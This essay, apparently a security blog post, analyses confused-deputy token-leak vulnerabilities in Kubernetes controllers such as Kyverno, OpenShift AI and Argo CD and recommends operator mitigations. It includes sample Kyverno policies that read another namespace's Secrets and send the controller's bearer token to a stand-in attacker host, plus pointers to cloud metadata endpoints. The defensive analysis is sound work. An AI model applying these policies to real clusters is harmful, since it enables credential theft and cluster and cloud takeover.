A developer at a mid-sized SaaS shop pushes a ClusterPolicy change through your GitOps pipeline. The diff is six lines, mostly indentation. It adds an apiCall block that fetches an internal allowlist from http://allowlist.attacker.example.com/v1/list instead of the legitimate internal service. The pull request is approved by a reviewer who is half-paying-attention because the Kyverno policies in this repo change three times a week.

Within seconds of the policy syncing into your cluster, your Kyverno admission controller faithfully makes an outbound HTTP request to that URL — and on the way out, the controller’s helper code attaches an Authorization: Bearer <kyverno-controller-token> header, because that’s what the helper has done by default since 2024. The attacker now has a Kubernetes ServiceAccount token bound to an identity with get/list on every Secret in the cluster, the right to mutate any Pod, and the ability to push a new MutatingWebhookConfiguration that intercepts every API call on its way through. They are, for all practical purposes, cluster-admin.

This is not a hypothetical. It’s the Kyverno CVE-2026-40868 attack chain, and it’s the fourth distinct CVE shipped against the same apiCall feature in roughly three months. It is also the same architectural pattern that produced CVE-2026-5483 in Red Hat OpenShift AI’s odh-dashboard two weeks ago, and CVE-2025-55190 in Argo CD’s project API last fall. Different products, different teams, same bug class. Kubernetes has a confused-deputy problem, and it is not going to fix itself.

The Pattern Has a Name

The “confused deputy,” first described by Norman Hardy in 1988, is when a program with high privilege is tricked by a low-privilege caller into using its own authority to access something the caller could not access directly. The classic example is a billing daemon running as root that accepts a user-supplied output file path and writes the user’s invoice wherever they tell it — including /etc/passwd.

Kubernetes is a confused-deputy generator by construction. Every controller in the cluster is a privileged process running on behalf of less-privileged users, authenticating with a ServiceAccount whose RBAC is — almost universally — broader than any individual user’s. And it accepts user-supplied input: ClusterPolicies, Application manifests, CRDs, dashboard requests. Whenever the privileged side of that boundary uses its own credentials to act on the user-controlled side, the conditions for confused-deputy escalation are present.

For most of the last decade, the Kubernetes security conversation has been about pod-to-host escapes and RBAC privilege creep. Both have improved. The 2026 problem is different: the privileged identity inside the cluster — the controller’s ServiceAccount, with its broad ClusterRole binding and its long-lived (or insufficiently bound) token — is being leaked outward through helper code that nobody is auditing.

Six CVEs Across Four Products

The pattern is concrete enough that you can list the CVEs without straining for examples.

CVE-2026-22039 — Kyverno cross-namespace privilege escalation via Policy apiCall.urlPath. Disclosed February 2026, CVSS up to 10.0. A user with permission to create a namespaced Policy can construct a urlPath that — after Kyverno’s variable substitution — resolves to an arbitrary Kubernetes API path. The controller then performs that API call using its own ServiceAccount token, breaking namespace isolation entirely. A tenant in team-a can read Secrets in team-b, list ClusterRoleBindings, or hit the cloud metadata endpoint at 169.254.169.254.
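A minimal sketch of what such a policy could look like. The field names follow Kyverno’s documented apiCall context syntax, but the policy and namespace names are illustrative, and this is not the advisory’s actual proof of concept:

```yaml
# Illustrative only — the shape of a cross-namespace apiCall escape,
# not the real exploit from the advisory. Names are hypothetical.
apiVersion: kyverno.io/v1
kind: Policy
metadata:
  name: lookup                # hypothetical policy name
  namespace: team-a           # the attacker's own, low-privilege namespace
spec:
  rules:
  - name: read-across-the-fence
    match:
      any:
      - resources:
          kinds: ["ConfigMap"]
    context:
    - name: loot
      apiCall:
        # After variable substitution, Kyverno performs this API call
        # with the controller's own ServiceAccount token — not the
        # policy author's identity.
        urlPath: "/api/v1/namespaces/team-b/secrets"
    validate:
      message: "{{ loot }}"   # reflects the privileged response to the caller
      deny: {}
```

The point of the sketch is the trust boundary: nothing in the policy object carries the author’s identity, so the controller has no basis to downscope the call.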

CVE-2026-4789 — Kyverno SSRF via apiCall from any policy author. A separate code path in Kyverno’s apiCall feature allows the controller to make arbitrary outbound HTTP requests, including to internal cluster services and cloud metadata endpoints, all with the controller’s bearer token in the Authorization header. Affects 1.16.0 and later; the fix landed in main in early April 2026, but at disclosure there was no patched release.

CVE-2026-40868 — Kyverno apiCall service.url implicit bearer-token injection. Disclosed April 14, 2026, CVSS 8.1. The servicecall helper auto-attaches the controller’s bearer token to outbound requests whose URL is policy-controlled. Patched in Kyverno 1.17.0; no backport for 1.15.x or 1.16.x.
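The opening scenario maps onto this helper directly. A sketch of the relevant policy fragment, using the attacker URL from the scenario above; the rule shape is illustrative:

```yaml
# Illustrative fragment — service.url is policy-controlled, and the
# servicecall helper auto-attached the controller's bearer token to
# whatever destination it named.
context:
- name: allowlist
  apiCall:
    method: GET
    service:
      url: http://allowlist.attacker.example.com/v1/list  # attacker-controlled
```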

GHSA-8wfp-579w-6r25 and GHSA-f9g8-6ppc-pqq4 — companion advisories to the above, covering related token-leak paths in the same apiCall machinery. Treat them as variants of the same root cause.

CVE-2026-5483 — Red Hat OpenShift AI odh-dashboard Service Account token disclosure. Published April 10, 2026, CVSS 8.5. A Node.js endpoint in the dashboard returns Kubernetes ServiceAccount token data in its response — CWE-201, “Insertion of Sensitive Information Into Sent Data.” If the dashboard Route is exposed (which is the default in most OpenShift deployments), the endpoint is reachable without prior authentication. The dashboard’s ServiceAccount in many deployments has near-cluster-wide reach.

CVE-2025-55190 — Argo CD project-level API token leaking repository credentials in plaintext through /api/v1/projects/{project}/detailed. CVSS 10.0. A project token without explicit secret-read permissions could nonetheless retrieve repo usernames and passwords for every repository attached to the project — a different shape of confused deputy, where the API endpoint elevates the caller’s read scope using the controller’s broader access.

Six CVEs across four widely-deployed control-plane components in roughly seven months. Argo CD is the GitOps deployer of record for a meaningful slice of the Kubernetes operator economy. Kyverno is one of the two dominant policy engines. OpenShift AI is the platform Red Hat is pushing as the enterprise ML stack. None of these are obscure. The bug class has reached the point where you should treat any cluster controller that accepts user input and makes outbound network calls as a candidate for the same audit you would do on a public-facing web application.

Why Controllers Make Such Good Confused Deputies

Three architectural conditions, all common, combine to produce this pattern.

Condition one: a broad ClusterRole bound to a long-lived ServiceAccount. The default Kyverno Helm chart binds the admission controller to a ClusterRole with cluster-wide read on Secrets, mutate access on most workload kinds, the ability to create SubjectAccessReviews and TokenReviews, and the right to generate resources in arbitrary namespaces. The default OpenShift AI dashboard ServiceAccount is broadly scoped because the dashboard manages notebooks, model serving, and pipelines across the platform. Argo CD’s controllers can read every repo credential and deploy to every target. None of these were misconfigurations — they are the product’s default scope of authority, and they have to be that broad for the product to function. The radius of a confused-deputy attack is therefore the product’s authority, not the user’s.

Condition two: a helper that auto-attaches the controller’s identity. Kyverno’s apiCall helper auto-injects Authorization: Bearer <token> because some apiCall destinations are the Kubernetes API itself, and the helper’s authors did not want every policy author to have to copy a token-mount block into their YAML. OpenShift AI’s dashboard returns ServiceAccount token material because some legitimate flow inside the dashboard needed it server-side and a helper exposed more than it should have. Argo CD’s project endpoint includes repo credentials in /detailed because some legitimate flow needed them. In every case, the implicit, helpful behavior is the bug. The principle of “make the safe thing the default” was inverted: the default is to share the controller’s identity, and the safe thing requires explicit caller action to opt out.

Condition three: user-influenceable destinations. Kyverno apiCall URLs come from policy YAML. OpenShift AI dashboard endpoints accept user requests over HTTP. Argo CD project tokens authenticate against a multi-tenant API. Every one of these accepts input from a less-privileged caller and uses it to determine where the controller’s privileged identity goes next. There is no allowlist of trusted destinations on the privileged side, no separation between “act on my behalf with my reduced rights” and “act on the controller’s behalf with the controller’s full rights.” The controller does what the helper tells it to, and the helper does what the user said.

When all three conditions are present, the cluster’s most powerful identity becomes a function of the least-privileged user’s input. That is the working definition of a confused deputy, and it shows up at cluster scope every time.

The Pattern-of-Bugs Failure

Look closely at Kyverno’s apiCall feature and the picture becomes uncomfortable. CVE-2026-22039 is a urlPath bug. CVE-2026-4789 is an SSRF in the same feature. CVE-2026-40868 and the related GHSAs are token-leak variants. Different code paths, different exploits — but all of them root-cause to the same architectural choice: the apiCall feature accepts a destination from a user-controllable source and authenticates the outbound request with the controller’s identity. Every fix to date has been a point patch — disable bearer injection for service URLs, validate the namespace on urlPath, add an allowlist flag — without rethinking the underlying assumption that the controller is the right principal to make these calls.

When a single feature ships four CVEs in three months, the responsible engineering response is not another point fix. It is to ask whether the feature should exist in its current form. Kubewarden’s response to the Kyverno bug class was a public statement that Kubewarden is not affected because it does not support outbound apiCall-style enrichment. That is not luck. That is a deliberate architectural choice to refuse the feature that produces the bug class.

The Cloud Compound Effect

The damage of a leaked controller token does not stop at the cluster boundary. On every major cloud provider, the cluster’s nodes have access to an instance metadata service: 169.254.169.254 on AWS and Azure, metadata.google.internal on GCP. On AWS EKS with IRSA or pod identity, an SSRF that originates from inside a controller pod can hit the IMDS, request the node’s IAM role credentials, and walk straight out of the cluster into the AWS account. On GCP, a similar dance produces a workload identity token. On Azure, the managed identity.

A Kyverno SSRF or token leak in a hosted Kubernetes environment is not a Kubernetes compromise — it’s a cloud compromise with a Kubernetes entry point. The blast radius is whatever the node’s IAM role is allowed to do, which on most operational deployments includes ECR push, S3 read, and at least some IAM operations. An attacker with the right policy edit can pivot to the cloud account in the time it takes for one HTTP request.

This is precisely what AWS confronted in 2019 with Capital One’s IMDSv1 SSRF. The industry’s response was IMDSv2, which requires a session token from a specific hardened code path. Kubernetes has no equivalent. There is no “controller token v2” that requires audience binding before it will authenticate, no protocol-level barrier to the controller token flowing wherever a helper sends it. The cluster’s most powerful identity is a long-lived bearer token in a file, and we move it around the network like it’s 2014.

Detection Is Almost Useless Here

The standard SOC playbook for credential theft assumes you’ll see something. A login from a strange geography. A user authenticating from two places at once. A token used from an unexpected network or at an unexpected time. None of those signals fire for this attack class.

The token leaves the cluster in a TLS-encrypted GET request that originates from the legitimate controller pod’s IP. To any observability layer that watches network metadata, this is normal Kyverno behavior — Kyverno makes outbound HTTP calls all the time as part of its apiCall feature. The destination is whatever URL the policy specified, which to a service mesh looks like an unrecognized but not necessarily malicious external endpoint. The Kubernetes audit log will show the system:serviceaccount:kyverno:kyverno identity making API calls after the token has been exfiltrated, but those calls will originate from outside the cluster — and most cluster audit log pipelines do not record the source IP of API authentication, or do not alert on it.

The only high-fidelity signal is structural: a ClusterPolicy with an apiCall.service.url that points outside the cluster’s known service network, or a controller-account API call from a source IP that is not the controller pod’s IP. Both require setup most clusters do not have.
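One way to get the structural signal is to enforce it at admission time rather than hunt for it afterward: reject policy objects whose apiCall destinations leave the cluster. A sketch using Kubernetes ValidatingAdmissionPolicy with a CEL expression; the URL pattern and resource list are assumptions to adapt, and the policy needs a ValidatingAdmissionPolicyBinding before it does anything:

```yaml
# Sketch: fail CREATE/UPDATE of Kyverno policies whose apiCall service URL
# is not an in-cluster *.svc address. The regex is an assumption — tighten
# it for your cluster's service domain before relying on it.
apiVersion: admissionregistration.k8s.io/v1
kind: ValidatingAdmissionPolicy
metadata:
  name: restrict-external-apicalls
spec:
  failurePolicy: Fail
  matchConstraints:
    resourceRules:
    - apiGroups: ["kyverno.io"]
      apiVersions: ["*"]
      operations: ["CREATE", "UPDATE"]
      resources: ["clusterpolicies", "policies"]
  validations:
  - expression: >-
      !has(object.spec.rules) || !object.spec.rules.exists(r,
        has(r.context) && r.context.exists(c,
          has(c.apiCall) && has(c.apiCall.service) &&
          !c.apiCall.service.url.matches(
            '^https?://[a-z0-9.-]+[.]svc([.]cluster[.]local)?(:[0-9]+)?(/|$)')))
    message: "apiCall service URLs must point at in-cluster services"
```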

This is the same problem the dwell-time-collapse essay flagged for ransomware: the detection model’s assumptions don’t match the attack’s shape. A token-leak confused deputy is silent. The breach is the policy commit, and the policy commit is in your GitOps repository, signed by a legitimate developer’s GPG key. There is nothing to detect after the fact except the consequences.

What To Actually Do

The honest answer is that the structural fix has to come from the controller authors, and most of them have not yet absorbed the lesson. Until they do, the operator-side mitigations are the same in shape across every product and worth doing now.

Audit the ClusterRoleBindings of every controller you run. Pull a list with kubectl get clusterrolebindings -o json | jq '.items[] | {name: .metadata.name, role: .roleRef.name, subjects: .subjects}' and ask the same question of each: if this token leaked tomorrow, what is the worst case? If the answer is “they read every Secret in the cluster,” your priority is reducing what that token is allowed to do, not detection.
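Where the audit shows a cluster-wide Secret grant that the controller only exercises in its own namespace, the reduction is mechanical: replace the ClusterRoleBinding with a namespaced Role and RoleBinding. A sketch with hypothetical names — not every controller can be narrowed this far, per the defaults discussion above:

```yaml
# Sketch: namespaced Secret read in place of a cluster-wide grant.
# All names are hypothetical; substitute your controller's ServiceAccount.
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: controller-secrets-read
  namespace: controller-ns
rules:
- apiGroups: [""]
  resources: ["secrets"]
  verbs: ["get", "list"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: controller-secrets-read
  namespace: controller-ns
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: controller-secrets-read
subjects:
- kind: ServiceAccount
  name: controller
  namespace: controller-ns
```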

Move every controller to projected, bound, audience-scoped tokens. Since Kubernetes 1.22, projected ServiceAccount tokens with the TokenRequest API support audience binding, time-bound expiration, and automatic kubelet-side rotation. The Kyverno apiCall token-leak attack still works against a projected token, but the leaked credential expires in an hour instead of being valid until the controller’s lifecycle ends. That is not a fix, but it is a substantial reduction in the value of a stolen token. Every controller chart that still mounts long-lived tokens from the legacy auto-mount path should be re-templated.
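In manifest terms, the move is from the legacy auto-mounted Secret token to a projected volume. A sketch following the upstream bound-token projection shape; the pod and volume names are hypothetical, and the audience string varies by cluster:

```yaml
# Sketch: disable the legacy auto-mount, then project a bound token that
# expires hourly and is rotated by the kubelet.
apiVersion: v1
kind: Pod
metadata:
  name: controller
spec:
  serviceAccountName: controller
  automountServiceAccountToken: false
  containers:
  - name: controller
    image: example.invalid/controller:latest    # placeholder image
    volumeMounts:
    - name: bound-token
      mountPath: /var/run/secrets/kubernetes.io/serviceaccount
      readOnly: true
  volumes:
  - name: bound-token
    projected:
      sources:
      - serviceAccountToken:
          path: token
          audience: https://kubernetes.default.svc  # verify for your cluster
          expirationSeconds: 3600                   # the one-hour bound above
      - configMap:
          name: kube-root-ca.crt
          items:
          - key: ca.crt
            path: ca.crt
      - downwardAPI:
          items:
          - path: namespace
            fieldRef:
              fieldPath: metadata.namespace
```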

Apply NetworkPolicy egress to every controller namespace. A controller does not need outbound internet access by default. Block 169.254.0.0/16 (cloud metadata, link-local), allow only the Kubernetes API server CIDR plus required in-cluster services, and watch for 24 hours. If something breaks, you’ve discovered a feature you didn’t know your platform was using; if nothing breaks, you have eliminated an entire class of exploit paths. For Kyverno specifically, the controller’s egress should be the API server and nothing else unless you have a documented policy that requires external apiCalls.
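A starting-point manifest for the Kyverno case. The API server address below is a placeholder you must substitute, and on some managed platforms the API server sits outside the pod network, so confirm the allow rule actually matches before enforcing:

```yaml
# Default-deny egress for the controller namespace, then allow only DNS
# and the API server. 169.254.0.0/16 (cloud metadata) is blocked
# implicitly because it appears in no allow rule.
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: controller-egress
  namespace: kyverno
spec:
  podSelector: {}
  policyTypes: ["Egress"]
  egress:
  - to:                                    # in-cluster DNS
    - namespaceSelector: {}
      podSelector:
        matchLabels:
          k8s-app: kube-dns
    ports:
    - protocol: UDP
      port: 53
    - protocol: TCP
      port: 53
  - to:                                    # API server — substitute your CIDR
    - ipBlock:
        cidr: 203.0.113.10/32              # placeholder address
    ports:
    - protocol: TCP
      port: 443
```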

Restrict cluster-scoped policy and CRD edit verbs. The Kyverno attack requires clusterpolicies.kyverno.io create/update permission. The Argo CD attack requires project token issuance. The OpenShift AI attack is even worse because no privileged user action is required at all. For the first two, the question is whether your developers should have direct edit rights on cluster-scoped policy resources, or whether those changes should go through a more guarded pipeline with a slower approval. The “everyone can edit ClusterPolicies because GitOps” model is an open door to a CVE-2026-40868-shaped attack.
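If you do carve developers down to namespaced policies only, a hedged RBAC sketch with hypothetical names follows. Note the caveat baked into the comment: CVE-2026-22039 above was exploitable from a namespaced Policy, so this restriction only helps in combination with disabling apiCall:

```yaml
# Sketch: developers get Policy edit in their own namespace and no grant
# on clusterpolicies.kyverno.io. Per CVE-2026-22039, namespaced policies
# can still abuse apiCall — pair this with disabling the feature.
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: policy-editor            # hypothetical name
  namespace: team-a
rules:
- apiGroups: ["kyverno.io"]
  resources: ["policies"]
  verbs: ["get", "list", "create", "update", "patch", "delete"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: policy-editor
  namespace: team-a
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: policy-editor
subjects:
- kind: Group
  name: team-a-developers        # hypothetical group
  apiGroup: rbac.authorization.k8s.io
```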

Refuse the feature where you can. Kubewarden’s response to the apiCall bug class was to never ship the feature in the first place. If you are using Kyverno’s apiCall context exclusively to fetch internal data that could be expressed as a Kubernetes resource — a ConfigMap, a CRD — switch to that. The --enableApiCallContext=false controller flag removes the attack surface entirely. Most teams using apiCall don’t need it for the policies they actually have; they enabled it because the example in the docs used it.
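In a Helm-managed install, that flag would land in the controller’s container args. The values key paths below are an assumption — chart layouts vary by Kyverno chart version — so treat this fragment as a shape to verify against your installed chart’s values schema, not something to copy:

```yaml
# values.yaml sketch — key paths are an assumption; check your chart
# version's values schema before applying.
admissionController:
  container:
    extraArgs:
      enableApiCallContext: false
```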

Audit every controller dashboard or web UI for exposed token endpoints. OpenShift AI is not the only controller component with a dashboard that ships server-side endpoints. Run an authenticated and unauthenticated probe of every cluster web UI you operate, with eyes on responses that include JWT-shaped strings, anything that base64-decodes to something that looks like a Kubernetes token, or any field labeled token, bearer, or secret. The attack surface here is not novel — it’s the standard “find sensitive data in API responses” hunt — but most teams have never run it against their own platform components.

The Architectural Conclusion

The Kubernetes ecosystem grew up on the assumption that controllers are trusted infrastructure. They run as the platform, with the platform’s authority, and the contract was that users would supply YAML and controllers would execute it on their behalf. That contract is fine when the YAML is a Pod spec. It breaks down when the YAML is a policy that tells the controller where to send its own credentials.

The controller-token-leak class is what happens when that contract meets feature creep. Every modern controller is accreting “enrichment” capabilities that let policy authors fetch data from external systems, and every one of those enrichments is a candidate for the same bug pattern Kyverno has now shipped four times. OpenShift AI is the same pattern in a different idiom — a dashboard exposes server-side data because someone needed it for a UI feature. Argo CD is the same pattern in a third — a project endpoint returns more than its caller is supposed to see because the helper that built the response is using the controller’s view of the world.

The fix is not another point patch on Kyverno’s servicecall helper. The fix is for controller authors to internalize the same lesson that web framework authors internalized about SQL injection in the late 2000s: a feature that takes user-controlled input and combines it with privileged identity is dangerous by default, and the safe path has to be the only path. Auto-attaching a bearer token because “policies usually want one” is the equivalent of mysql_query("SELECT * FROM users WHERE id = $id"). It will produce CVEs forever until the API itself refuses to do it.

Until that shift happens, your job as an operator is to assume every controller in your cluster is a confused deputy with a CVSS 9 waiting to be discovered, and to architect around that assumption. Reduce the token’s authority. Bind its lifetime. Block its egress. Audit its inputs. Treat your developers’ direct write access to cluster-scoped resources as a privilege boundary, not a productivity feature.

The controllers will eventually catch up. The bug class is now public, and the security teams behind them will spend Q3 hardening the helper functions that produced this quarter’s CVEs. Until that lands across the ecosystem, the easiest privilege escalation in any given Kubernetes cluster is not a kernel exploit, not a container escape, and not a misconfigured RBAC binding. It is one helper function inside one controller, doing exactly what it was written to do.